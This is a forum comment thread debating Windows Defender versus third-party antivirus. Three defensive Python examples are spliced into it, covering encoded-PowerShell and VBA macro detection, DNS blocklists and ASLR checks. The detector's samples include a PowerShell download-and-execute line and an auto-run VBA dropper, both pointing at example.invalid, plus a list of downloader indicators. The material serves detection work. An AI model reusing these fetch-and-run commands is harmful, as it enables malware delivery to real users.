Google Chrome Engineer Says Windows Defender 'the Only Well Behaved Antivirus', Cites 'Tons of Empirical Data' (onmsft.com)
Days after former Firefox developer Robert O'Callahan said that antivirus security suites are not necessary and that AV vendors are of little help, a Google Chrome engineer has echoed the same message, reaffirming that Microsoft's built-in software is indeed the most well-behaved security suite. From a report: Apparently the disdain for 3rd party AV solutions runs deep amongst browser developers, as in response to the threads a Google engineer, Justin Schuh, had this to say: "Browser makers don't complain about Microsoft Defender because we have tons of empirical data showing that it's the only well behaved AV."
I tend to agree. I used to have third party anti-virus on the wife's machine and the kids' machine, but really the most effective malware prevention is to take away root/admin privileges altogether. Anti-virus doesn't protect against the stupidity of users. If they install malware, no anti-virus will stop them. Almost everything that the anti-virus software caught was benign and a false alarm. And despite being useless, the crap software was a resource hog.
I have since uninstalled anti-virus. I will do an occasional Malwarebytes scan, but have done so less and less frequently as I find little but tracking cookies.
So, yes, I agree with this report.
Now Microsoft will promptly fuck up Defender.
I have a friend who's a Windows Defender and he just goes on and on about how great Microsoft's products are. Pretty intrusive if you ask me.
I clicked on the link, get a popup asking me to disable my ad-blocker...fine. Done. Turns out the article is about a paragraph and just regurgitates some twitter garbage. Utterly useless site.
Antivirus nowadays always tries to install some sort of browser addon/plugin.
What's this? Russian troll army prefers that all Americans use Kaspersky?
The problem is that every company other than Microsoft has a built-in conflict of interest. The AV software companies' profit motives are not aligned with providing a good user experience. A good anti-virus system should be nearly invisible. It is hard to convince customers to pony up a lot of money for security software unless you are always in their face, and an anti-malware system that does this inherently results in a bad product. Worse, they have to keep tacking on extra "features" and products to convince customers their product is better than the next guy's. Their business model is based on scaring customers so they buy their product based on perceptions rather than on actually keeping them safe.
It's probably the "best-behaved" because it is one of the least effective anti-virus products. It has terrible detection rates compared to its competitors. The other anti-virus programs may be pushier and embed themselves deeper into the host system, but that's necessary in order for them to (try to) root out the infections.
Arguably end-users do not need this sort of protection offered by better AV packages, and Microsoft's product is "good enough" for most users. Certainly, better antivirus is no panacea; even the best scanner can still miss some viruses. Personally, having cleaned out too many virus-infected machines, I'd rather the end-user have the maximum available protection if only to slow down the infection rate a little, although that still doesn't help when the end-user deactivates the AV, never updates it or just flat-out ignores its warnings. But regardless of your opinion of the /necessity/ of the software, you can't simply judge Microsoft's offering without taking into consideration its effectiveness. It is "best behaved" (for whatever that means) because it simply /does less/.
These engineers forgot the most effective, powerful anti-virus product that is an absolutely essential install: the ad blocker.
All the AVs today pretty much catch the same low-hanging fruit, and there's no good reason to buy a third-party bolt-on anymore.
That said, I'm getting annoyed with AV packages still not being able to flag things like base64-encoded PowerShell scripts or Office doc VBS scripts that make direct references to system libraries. Almost all the malware that's made it through our defenses in the past six months has used one of these two techniques (plus a little code obfuscation, but still), and none of the AV packages I've tested (via sites that scan against dozens of packages) have ever flagged any of the most effective offenders.
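The two techniques the post above complains about (base64-encoded PowerShell command lines, and Office macro source that declares direct Win32 API imports) are both cheap to flag on the endpoint or in a command-line/process log. The following detector is an added example, not code from the original thread or from any AV product: it decodes the `-EncodedCommand` argument the way PowerShell does (base64 over UTF-16LE) and looks for common download-and-execute indicators, and it scans VBA macro source (what the post calls "Office doc VBS scripts") for `Declare ... Lib` statements that import libraries such as kernel32 or urlmon. The indicator lists, the command lines and the macro text are all constructed for the example.

```python
"""Hypothetical detector for base64-encoded PowerShell command lines and VBA
macros that import Win32 APIs directly. All sample inputs below are constructed."""
import base64
import re

# Indicators commonly seen in decoded downloader / loader scripts (assumption:
# a real deployment would tune this list to its own environment).
PS_INDICATORS = [
    "invoke-expression", "iex", "downloadstring", "downloadfile",
    "frombase64string", "reflection.assembly", "add-type",
    "virtualalloc", "kernel32",
]

# Win32 libraries a document macro rarely has a legitimate reason to import.
VBA_SUSPECT_LIBS = {"kernel32", "urlmon", "wininet", "shell32", "ntdll", "advapi32"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; match the usual ones.
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
VBA_DECLARE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"', re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")  # PowerShell encodes the script as UTF-16LE
    except (ValueError, UnicodeDecodeError):
        return None


def scan_powershell(cmdline):
    """Decode an encoded command line and return the sorted indicators found in it."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return []
    lowered = script.lower()
    return sorted(ind for ind in PS_INDICATORS
                  if re.search(r"\b" + re.escape(ind) + r"\b", lowered))


def scan_vba(source):
    """Return (function, library) pairs for Declare statements that import suspect DLLs."""
    hits = []
    for func, lib in VBA_DECLARE.findall(source):
        base = lib.lower()
        if base.endswith(".dll"):
            base = base[:-4]
        if base in VBA_SUSPECT_LIBS:
            hits.append((func, base))
    return hits


def encode_command(script):
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples: one benign command line, one typical downloader, one macro.
SAMPLE_BENIGN = "powershell.exe -NoProfile -EncodedCommand " + encode_command("Get-Date")
SAMPLE_DOWNLOADER = ("powershell.exe -NoP -W Hidden -enc " + encode_command(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"))
SAMPLE_VBA = '''
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As LongPtr) As Long
Private Declare PtrSafe Function MsgBoxDummy Lib "user32" Alias "MessageBoxA" (ByVal h As LongPtr) As Long
Sub AutoOpen()
    URLDownloadToFile 0, "http://example.invalid/payload.exe", Environ("TEMP") & "\\p.exe", 0, 0
End Sub
'''

if __name__ == "__main__":
    print("benign:", scan_powershell(SAMPLE_BENIGN))
    print("downloader:", scan_powershell(SAMPLE_DOWNLOADER))
    print("macro:", scan_vba(SAMPLE_VBA))
```

Fed process-creation or command-line logs, `scan_powershell` turns the opaque base64 blob into something a rule can actually inspect; the word-boundary match keeps `iex` from firing on unrelated substrings. `scan_vba` deliberately ignores `user32` so that an ordinary message-box import is not flagged, while a `urlmon` import (the classic `URLDownloadToFile` dropper) is.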
Far too often, antivirus products follow the "cable television" market strategy:
"Yes, we know you already pay us for a subscription, but we can get so much more out of you by forcing you to see all kinds of shit you really don't want, including adverts for all our other services."
And, in the case of free antivirus, this too:
"We can see that you really don't want our full package, otherwise you would have bought it instead of opting for the free version, but we feel compelled to try to upsell you at each and every possible opportunity, and won't relent at all. We will even be really obnoxious with your notification area, and make your system play audio adverts, because that's how much we really want you to have a subscription (but see the prior market strategy: we won't let up on the ads even if you do!)"
They invest tons of resources (both computational and time-wise) into making needlessly flashy UIs with big colorful buttons, and scary "CSI: Miami"-esque dialogs, when really the part that matters, how well they can trap execution events without bogging the system down, seems to get nearly no love, and appears to get shittier and shittier.
Then you have Windows Defender. It's so plain, you instinctively ignore its presence. Except on older XP systems (where there was a CPU utilization bug), it runs with a very modest system footprint. It does not constantly vomit spam into your system tray, and does not try to milk you for additional service agreements, or to switch to a paid version. It behaves itself very well.
If Avast or AVG behaved like that, instead of trying to be garishly tawdry and whorishly self-promoting like prostitutes, and reduced their system resource consumption habits accordingly, they would win hands down.
But no, fleecing idiots is much more profitable.
I started doing PC support in my field with grandmas and small businesses.
AV software WAS USEFUL in the XP/98 era. I would argue with Slashdotters, calling them morons for not running it, as you had 1 min max before infection on Windows 2000 or XP with no firewall!!
We all ran administrator aka root, and Win32 even had account impersonation services. Gee, a dialup with no firewall, or a shitty software one, with IE 6 running Java and Adobe Flash without a sandbox on a local admin account was the norm, so what could possibly go wrong!!??
Vista, god bless it, made UAC, privilege separation, scrambled RAM addresses with ASLR, buffer overflow protected buffers in C/C++, and pseudo local admin accounts which instead used a token to run something. Thanks Theo from OpenBSD for inspiration.
Windows 10 goes further too by using x86 features to separate data from executable bits directly on the CPU and signed bootloaders.
AdBlock and sandboxed Adobe products all make Windows OK now. Not perfect, but OK.
I just reused an Asus Sabertooth I threw out in storage 2 years ago. I thought it was broken! Why? ESET kept making my SSDs lose data. I thought SATA ports were bad. Went through 3 expensive SSDs. It was my damn AV software glitching them.
Keep updates current, run AdBlock, use a DNS service like the free Norton DNS servers on your router, and for heaven's sake don't click everything you download, and you will be fine in 2017. AV software forges SSL certificates too, which is dangerous.
http://saveie6.com/
I used to work for an AV vendor in their IT department. Others in my family have continued working in the software security industry for decades. They really are just bloated resource suckers with little value. As such, I haven't run anti-virus beyond windows defender for a little over 10 years, not even on my kids computers. They're kept up to date, ads are blocked on my network, and I have taught my kids how to recognize an executable from other kinds of files (thank god for re-enabling file extensions being shown, the stupidest Windows default of them all).
We had one virus when my daughter opened an email that gave her some nasty popups constantly. She learned a valuable lesson that day, but I was able to reverse it in less than an hour booting into safe mode and removing the files. Been fine otherwise.
That does rather presume you're running Windows.
Which, let's be honest, Windows is SO badly full of security holes compared to any other OS that Microsoft HAD to come up with Defender to avoid losing all credibility.
Defender still appears to really just be an easy copout workaround for Microsoft, rather than them addressing the actual problem which is the fundamentally weak architecture of Windows itself.
Developers of new software sometimes bump into false positives, and they are either smart enough to avoid malware or never even notice when one gets past their installed virus scanner. So they prefer one of the weakest virus scanners.
[acts surprised]
RAV Antivirus was bought in 2003 by Microsoft. Not long after that, Microsoft came out with its own antivirus offering. Back in the day, RAV was the best out there, finding and cleaning things the other major makers missed. Hmmm
Regardless of anyone's particular sentiments on APK (he doesn't bother me), black-holing garbage domain names (something something hosts file) and IP addresses (if possible) is an excellent source of additional protection.
After years of pain from the likes of Norton, McAfee, Sophos, NOD32, all of which can make you want to have a virus instead of the antivirus, Windows Defender is the only one that hasn't compelled me to rip it out.
I think Windows Defender is better than any of the AV out there - and that this signifies that MS has finally found its core competency. It needs to get out of the OS business and stick to AV.
That said, no AV is a poor prospect too, especially for business. I work for a local break-fix shop that also is branching into MSP work for our small to mid biz clients. Our system uses a modified Bitdefender + site blacklisting. It works well but does have a footprint. I say it is useful though because some of our clients are 30-50 seat law firms, insurance companies, and financial institutions; you would not believe how heavily targeted they are with social engineering attacks designed to install malware. Mostly through email attachments, but there have been DOS attacks, password attacks against open ports, and DNS redirect attacks.
User training is #1, but AV and good backups have saved the bacon more than once. We see constant removals of crypto virus installers, only 2x in the past 3 years has one actually gotten through by being too new for detection. How many would that be without an AV with a 95%+ catch rate?
I was always a fan of Symantec. Their entire suite became a huge resource hog. But, it was always better in antivirus tests. Once I found out that Microsoft stops checking for viruses where the exploit has been fixed in Windows, that made sense. Defender just stopped checking for viruses that will do no harm to the system. Drops the overhead dramatically.
I don't use any AV software. I don't need to. I have ClamAV in a live session for customers. And that way there are no files locked.
...Browser makers don't complain about Microsoft Defender because we have tons of empirical data showing that it's the only well behaved AV....
There is more, a lot more, to an a/v than what is seen via the myopic view of a browser developer.
Did they also give ya the subscribe to the newsletter popup for the ultimate trifecta?
They're not glorifying effectiveness (though most testing shows they all are pretty equal now) instead they're explaining that Microsoft's solution behaves well with applications which is generally true as it's less invasive.
As a former developer of web browsers (6 years of it), I can confirm that from a developer's point of view, Microsoft hooks more cleanly into the sockets API than the others I've used.
Don't get your panties in a bunch.
When I tried out Bit Defender in 2014, it would fill up my RAM, and I'd have to reboot once a day. It's been some time now, since I've used it, and I don't know if they ever got around to fixing that or not.
Yeah - too late by then. Buh-bye!
AC, where did you read Beau's name? msmash posted this. You might have had more credibility had you gotten at least THIS right
Black-holing garbage domains (ad sources and trackers especially) is definitely a good idea, but the problem with a hosts file is that you can't do wildcards, so while you can easily block "foo.domain.com" and "bar.domain.com", you can't block "{random string}.domain.com" unless you know what "{random string}" is in advance; to do that requires either a DNS based blocklist or some other software tool. That's getting to be a problem given that marketing/tracking companies are slowly (and it's taken them long enough) waking up to the possibility that you can use "{random string}" as a wildcarded DNS entry to track whether a link was looked at or not just as effectively as a custom URL or cookie.
Also, to add to the GP's comment about the importance of an Ad-Blocker, let's not forget blocking auto-run of certain browser plugins and the ability to whitelist sites that can run JavaScript / save cookies.
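The hosts-file limitation described in the post above comes down to match semantics: a hosts file is an exact-name lookup, while a DNS blocklist zone matches an apex and everything beneath it. The following is an added example (not code from the thread or from any blocklist tool) that implements both lookups side by side so the difference can be seen on a randomised subdomain; the hosts entries, zone list and queries are constructed for the example.

```python
"""Hypothetical blocklist matcher contrasting hosts-file exact matching with
DNS-zone (suffix) matching. Sample hosts entries, zones and queries are constructed."""


def normalize(name):
    """Lower-case a hostname and strip any trailing dot so lookups are canonical."""
    return name.strip().lower().rstrip(".")


def parse_hosts(text):
    """Return the set of names a hosts file would resolve; comments and blanks are skipped."""
    names = set()
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        for host in parts[1:]:          # parts[0] is the address the names map to
            names.add(normalize(host))
    return names


def blocked_by_hosts(name, hosts):
    """A hosts file only matches the exact name; unknown subdomains pass through."""
    return normalize(name) in hosts


def blocked_by_zone(name, zones):
    """A DNS blocklist zone matches the zone apex and every name beneath it.

    Walk the label list from the left so that 'nottracker.example' is not
    mistaken for a subdomain of 'tracker.example'."""
    labels = normalize(name).split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in zones:
            return True
    return False


# Constructed example data: two fixed tracker hosts and one blocklist zone.
SAMPLE_HOSTS = """# constructed hosts file
0.0.0.0 foo.tracker.example
0.0.0.0 bar.tracker.example
127.0.0.1 localhost
"""
SAMPLE_ZONES = {normalize(z) for z in ["tracker.example"]}


def classify(queries, hosts_text=SAMPLE_HOSTS, zones=SAMPLE_ZONES):
    """Return {query: (blocked_by_hosts, blocked_by_zone)} for a list of looked-up names."""
    hosts = parse_hosts(hosts_text)
    return {q: (blocked_by_hosts(q, hosts), blocked_by_zone(q, zones)) for q in queries}


if __name__ == "__main__":
    for query, (h, z) in classify(["foo.tracker.example", "x7k2q.tracker.example.",
                                   "nottracker.example", "tracker.example"]).items():
        print("%-28s hosts=%-5s zone=%s" % (query, h, z))
```

The zone lookup is what resolver-side blocklists do; in dnsmasq the equivalent of one zone entry is `address=/tracker.example/0.0.0.0`, and in Unbound `local-zone: "tracker.example" always_nxdomain`, both of which cover every subdomain without knowing the random label in advance.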
UNIX? They're not even circumcised! Savages!
Anti-virus suites have one huge problem. They are worse than getting a virus. At least a virus tries to hide and not kill your system. AV programs have no such respect for the users.
Yes it's an anecdote! Were you expecting original research in a Slashdot comment?
At least they are kind enough to provide a "Continue without supporting us" link unlike WSJ SJW.
I had Bitdefender installed on my machine about a year ago and I was writing C++ HPC software. Everything was compiled with the Intel compiler and MKL with profile guided optimizations. Bitdefender started detecting my binaries as virus infected and deleting them. This happened a few times and I disabled it for a month and later turned it back on with newer virus definitions, and the same issue kept happening. It even detected some of the binaries I had on a shared drive and deleted them also.
The false positive rate on some of these scanners is just too high.
I will just stay with windows defender since it has not interfered with any of my debugging or profiling and has never deleted the software I am compiling.
Strongly suspect the main reason the browser developers like Microsoft Defender as a "well behaved" AV is because it's purely a file level defence, and so doesn't interfere with the behaviour of the browser. Unlike many third party AVs, that will intercept internet traffic, looking for bad stuff before it hits your browser.
That's good from a browser point of view, because they don't have to deal with browsing problems being caused by the AV engine (for example, without whitelisting, ESET's engine will cause logins to my wireless router's web interface to break).
But it's not so good from an end user perspective, when malicious content is attacking the HTML / Javascript engines. There are trade offs to however you choose to manage your security, but I suspect for most people, actually using a good 3rd party paid-for AV is a good balance of having reasonably good protection without having to be overly pro-active in managing it.
Defender just gets on with its job with relatively little overhead or other intrusion. The same cannot be said of virtually any other AV suite. Even the "reputable" ones like McAfee, Norton etc seems to exist as a form of crapware these days and are so bloated and slow that any protection comes at a high price.
Well, it would be considering the Defender developers have full access to Windows.
"As a former developer of web browsers (6 years of it), I can confirm that from a developer's point of view, Microsoft hooks more cleanly into the sockets API than the others I've used."
As a typical computer user with basic fucking logic, NO DUH Microsoft can more cleanly hook into its own API than others.
Still waiting on Serviscope_minor to wake up to fucking reality and realize that Jessica Price isn't going to fuck him.
Agreed. Twitter is an utterly useless site.
Large anything degrades performance. Period. The larger it is, the more resources it uses.
Hosts is garbage in the world of IPv6. Hosts is a piece of insecure shit cobbled together from the late 90s meant to identify computers on a local network with a name instead of an IP address, and any serious security person never uses it, as it's bypassed by the OS at will (and by several programs with the right calls) nowadays anyways.
I read the entire thread up to my standard filter level, and this is what I concluded: the singular of anecdote is "one size fits all".
It's pretty clear from what I've read here that for a low-value target, I'd just settle for the low-hanging fruit of Windows Defender, ad blocking, a DNS block list, etc.
It's also pretty clear that for a high value target (e.g. law firm, bank) where the minimum system install is a bulked-out i7 I'd elect to suffer the bloat & obtrusiveness in order to obtain the somewhat better catch rate of a first-tier third-party solution. The people working for these kinds of institutions are pretty demoralised to begin with, it will just look like business as usual (and so it is).
The other side of this is that "one size fits all" is directly connected to the competency porn carapace. "Well, I work for banks and law firms and YOU can't handle the truth". But what actually gets written is this "YOU can't handle compensating my clients for a 48-hour loss of service". This tends to be a person whose amygdala has swollen to such a painfully large size that he or she can no longer multiply 1% times 365 (the constant friction of a badly behaved "solution") and can only multiply 100% times 2 days (as specified under the total availability-loss Weimar Reparations Act).
Someone has obviously not used BitDefender.
Kriston
With normal use you would not find "several instances of different types of malware" in the first place...
I haven't run any virus checker other than the one built-in to Windows for years now. They all catch old or obvious viruses. None of them is going to catch a new, clever virus. There's not a whole lot in the middle. Add in the virus-like behavior of the AV itself, the performance-suck of most of them, and it just doesn't make any sense to use them.
As another poster pointed out: user error is the biggest cause of virus infection. Train your users, use Windows Defender as a sort of "sanity check", make regular backups, and call it a day.
I have a strong instinct to take it with a bucket of salt when a stranger on the internet tells me "oh yeah, you should ditch your AV."
I think it's a bit more than just "Microsoft unfair advantage". Other AV products have always been monstrously bloated affairs, and have become all the worse over the last decade as they throw all kinds of other shit like firewalls and the like in. Products like McAfee and Norton have become almost as bad as the disease they purport to treat. So far as I can tell, Defender really doesn't do much more than sniff out viruses and malware, and while I agree Microsoft's insider knowledge probably gives it a bit of an edge, I think the narrower intent of the software has a lot to do with its better performance.
I've been running my company on MSE/FEP/Defender for the past 6 years with zero headaches caused by the anti-virus software itself and an infection rate of maybe 5 or 6 per year across 200 PC and laptops. Users have local admin rights. Perimeter IDS catches some things that get through.
It seems to work better than any other anti-virus I've used and I hate them all. It's certainly the least annoying.
BitDefender on OSX is terrible. I wouldn't recommend it to anyone for any reason. It often thrashes the CPU, increasing heat and battery usage, and obviously having a massive impact on disk performance and on overall system responsiveness. I've never used it on Windows, and likely never will. Windows Defender has always been fine for me on Windows; I've tried McAfee etc. in the past, and they've all been much more trouble than they're worth. I can't deal with the massive performance loss, and the strange abnormalities that often impede software testing brought about by AV software meddling in the filesystem and network layer.
There's a reason so many otherwise useful programs try to smuggle AV onto your machine unless you happen to notice it, and opt out. It's because nobody would willingly subject themselves to that.
Questions:
Does Windows Defender try to do other things besides defending?
Does Microsoft use Windows Defender as a way of gaining control over a computer?
Sorry, but in business, if you care about your data you go belt AND suspenders.
You run a multi-layer backup strategy.
You run antivirus.
You don't use "server" devices as someone's workstation.
Etc, etc.
Sure, your chances, especially with an intelligent, tech-savvy userbase are tiny.
But security is about more than just obvious stuff. And if you can catch corner-cases, so much the better. Less effort and cost for the client in the long run.
I use Bit Defender and it didn't react at all like what I could read here (i.e. RAM filled etc,..) It's not taxing my computers like I've seen other packages do and it's not nagging me constantly. I think the heuristic scan graph should be evaluated, from https://chart.av-comparatives.... , NOT the file detection which relies on known patterns. Heuristic will be much more taxing for your CPU/RAM and also shows the logic of an AV. (Windows) Defender is the base of comparison in this chart, just to show how low it is... Bit Defender is the big dog in this chart.
Antivirus software is a hot topic in IT security right now. Not because you need AV, but because most AV is terribly designed and breaks security in other applications. And while Windows Defender may not score particularly well on canned tests used by AV reviewers, it doesn't break as much software as other AVs do.
Remember that in order to work, AV has to inject itself all over the place in your system to intercept network activity, disk activity, etc. But if it does that at the expense of other security measures, is it really helping? As Justin Schuh said in his linked post, when Firefox implemented Address Space Layout Randomization (ASLR) to guard against buffer overflows, lots of AV suites disabled it by replacing Firefox's DLLs with their own which didn't feature ASLR. This stuff happens all the time, because AV vendors are always behind the curve in browser security compared to browser developers. Which isn't all that surprising if you think about it.
The upshot is, all AV software is pretty terrible. MS Defender isn't as good as some other AV suites at passing the canned tests that AV review sites throw at them. But at least it doesn't work against web browsers' built-in security measures.
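The failure mode described in the post above (a vendor module loaded into the browser that was built without ASLR) is something you can check for yourself rather than take on faith: whether a DLL opts into ASLR is recorded in the `DllCharacteristics` field of its PE optional header (`IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE`, 0x0040). The following is an added example, not code from the thread, from Mozilla or from any AV vendor: it parses just enough of the PE header to read that field and reports modules that would load at a fixed address. The images it inspects are constructed in the block itself; on a real machine you would feed it the on-disk paths of every module loaded into the browser process (for instance from `tasklist /m` or Process Explorer).

```python
"""Hypothetical check for DLLs loaded into a browser that were built without ASLR.
Reads DllCharacteristics from the PE optional header. Sample images are constructed."""
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification.
DYNAMIC_BASE = 0x0040       # image may be relocated at load time (ASLR opt-in)
NX_COMPAT = 0x0100          # image is compatible with DEP
HIGH_ENTROPY_VA = 0x0020    # 64-bit ASLR with high entropy


def dll_characteristics(data):
    """Return the DllCharacteristics word from a PE image, raising ValueError if malformed."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                       # 20-byte COFF file header follows the signature
    (size_of_optional,) = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20
    if size_of_optional < 72 or len(data) < opt + 72:
        raise ValueError("optional header too short")
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (0x10B, 0x20B):           # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ optional headers.
    (chars,) = struct.unpack_from("<H", data, opt + 70)
    return chars


def aslr_status(data):
    """Summarize the relocation / DEP flags the Windows loader would honor for this image."""
    chars = dll_characteristics(data)
    return {
        "dynamic_base": bool(chars & DYNAMIC_BASE),
        "high_entropy_va": bool(chars & HIGH_ENTROPY_VA),
        "nx_compat": bool(chars & NX_COMPAT),
    }


def flag_non_aslr(modules):
    """Given {name: image_bytes}, return the names that would load at a fixed address."""
    return sorted(name for name, data in modules.items()
                  if not aslr_status(data)["dynamic_base"])


def build_fake_pe(chars, magic=0x20B):
    """Constructed minimal PE32+ image containing only the fields this check reads."""
    e_lfanew = 0x80
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    size_of_optional = 240                    # size of a PE32+ optional header
    # Machine=AMD64, 1 section, no timestamp/symbols, optional header size, Characteristics=DLL
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, size_of_optional, 0x2022)
    opt = bytearray(size_of_optional)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 70, chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Constructed modules: one built the way a modern browser DLL is, one without ASLR.
SAMPLE_MODULES = {
    "browser_good.dll": build_fake_pe(DYNAMIC_BASE | HIGH_ENTROPY_VA | NX_COMPAT),
    "av_hook.dll": build_fake_pe(NX_COMPAT),  # hypothetical injected module, no DYNAMIC_BASE
}

if __name__ == "__main__":
    for name, data in SAMPLE_MODULES.items():
        print(name, aslr_status(data))
    print("fixed-address modules:", flag_non_aslr(SAMPLE_MODULES))
```

A single module without `DYNAMIC_BASE` is enough to give an attacker a predictable base address inside an otherwise randomized process, which is why the check is worth running per module rather than only on the browser executable.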
Thanks for your reply.
"... the most they [Microsoft managers] want is information on how to be either a middleman or true supplier for the things you want to buy."
That seems correct to me. However, it seems to me that Microsoft managers have little social ability. They can be self-destructive and not detect that they are being self-destructive. One example: In Windows 10, Microsoft tries to sell "APPS" to people who are employees of companies doing routine work.
It seems to me that Microsoft managers saw the success of Google's Android and search abusiveness, and wanted some of that success for themselves.
Most AV software is bloated crap that offers little actual security.
Microsoft has been focusing on power efficiency and battery life, so I'm not surprised if they traded off a little detection capability in order to run smoother.
Antivirus isn't even on the top of the list for avoiding an infection. That would be (1) don't browse as admin, (2) keep software updated, and (3) use an adblocker or filtering proxy.
With the vast majority of malware being drive-by downloaders, a good adblocker or filter offers more security and better performance. Antivirus is for suckers these days.
Serious host protection includes active IPS and/or application whitelisting, often in lieu of antivirus.
Anyone who has had to use AV software for any amount of time can easily tell you that Windows Defender is the *only* AV software anyone should be using anymore. Back in the day, there were a number of products out there which I would call good. Now, probably due to increased pressure for more profits, subscriptions, and increased monetization of every aspect of their business, I wouldn't want any of them. Not only are they all bloated resource hogs, they cause more problems than the viruses they catch. I'd rather have the viruses, as at least you don't pay for those. I don't know how many times I've had to look at friends' or family members' computers to find that some commercial AV software was causing all sorts of trouble. Is Defender the best at finding viruses? I don't know, perhaps not, but I do not care. I'd rather have something that provides most of the protection but isn't intrusive enough that it acts more or less like what it is trying to detect and remove.
I'd say there is one little caveat to the above. I'm referring specifically to ANTI-VIRUS software. An awful lot (if not most nowadays) of "malware" might be better categorized as "adware". There are a number of products out there that do a good job dealing with adware. Most adware of course targets your various browsers. I'd say as a rule there are a lot more of those out there in the wild than actual "viruses". Anyway, I would use both, Defender for viruses, and another product more specifically focused on adware.
For a variety of reasons years ago I used to run an unpatched Windows 7 machine. That thing was like a virus trawler! At any rate I had a lot of opportunity to use a host of tools and software. Having a good firewall (and setup), not going to sketchy websites, or clicking on stupid things goes a long way by itself. However inevitably you'd get things that require clean up. As mentioned, some things worked better than others, and some were as bad as the viruses they were supposed to protect you from. With that particular system, I think one of the easiest (provided you are prepared) and most certain things I did was, about every year or so, to just wipe the whole thing clean, do a fresh install, and restore files from backup. Get used to doing it a few times and it takes a few hours, and you can automate most of it.
It's nice to have the firewall though. Windows does not have a reasonable alternative. Some other features that AV packages have can be handy when setting up systems for relatives who are clueless about computers, like warning when a site is potential spam, your credit card number is going out in the clear, and so forth. Most malware these days is coming over the web browser so first line of defense should be there, and the AV is just to help catch what gets through.
Nice Fanboi flamebait post. Beau, did MicroShaft PAY you to put this up?
I can back this up based on my end-user servicing experience, and I'm not even a Microsoft fan. Recent versions of Windows before 10 are better protected with Microsoft Security Essentials (free from MS) plus periodic manual scans with MalwareBytes Free than the bloated antivirus scanners that bog down PCs for the first hour after every reboot. In Windows 10, the antivirus is finally built in once again, so long as you enable Windows Defender.
On OS X, the built-in Xprotect is the only antivirus you need. Watch for 'social engineering' malware installs ("the email I clicked on looked just like it was from the bank, so I entered my machine password when it asked me to") and browser redirects.
You can do the wildcards with a router based DNS server. Though this is not as easy and turnkey as an adblocker.
> Other AV products have always been monstrously bloated affairs, and have become all the worse over then last decade
Additionally, even decent antivirus tends to bloat over time.
Avira Antivirus and MalwareBytes Anti-Malware both have "web protection" modules that will not stop nagging you if you disable them, for example.
SecureAplus has white-listing as well as anti-virus.
My wife's computer and my daughter's computer were always becoming malware infested. Since using SecureAPlus with the whitelist restriction turned on we haven't had any problems. Now whenever a non-whitelisted program tries to run, they full-stop until I check it out. Plus the AV allegedly runs using multiple AV engines in The Cloud.
What about Windows' firewall makes it unreasonable? Honestly curious here.
When my wife went to the New York Times website and was infected by an ad, I decided ad blockers were a really good idea.
Exactly.
How does it happen that a huge organization lacks the simplest insight?
Well, last I looked it was pretty lacking. Maybe they've improved it over time?
Lacking what?
You mean just like every other OS?
I don't recall any OS that was immune to malicious code, can you point me to one?
APK likes to ask for responses to the same things over and over. Maybe he just likes the responses?